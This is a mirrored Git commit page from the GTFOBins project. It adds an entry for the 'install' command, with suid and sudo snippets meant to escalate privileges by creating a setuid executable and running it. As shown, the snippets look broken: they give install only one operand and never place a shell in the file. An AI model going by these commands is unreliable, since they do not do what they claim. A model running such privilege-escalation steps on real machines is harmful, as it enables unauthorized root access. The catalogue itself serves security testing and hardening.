mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-26 06:49:44 +01:00
New command: install
This commit is contained in:
parent
5a3e672d23
commit
146b146cd3
13
_gtfobins/install.md
Normal file
13
_gtfobins/install.md
Normal file
@ -0,0 +1,13 @@
|
|||||||
|
---
|
||||||
|
functions:
|
||||||
|
suid:
|
||||||
|
- code: |
|
||||||
|
TF=$(mktemp)
|
||||||
|
install -m 4755 $TF
|
||||||
|
$TF -p
|
||||||
|
sudo:
|
||||||
|
- code: |
|
||||||
|
TF=$(mktemp)
|
||||||
|
sudo install -m 4755 $TF
|
||||||
|
$TF -p
|
||||||
|
---
|
Loading…
Reference in New Issue
Block a user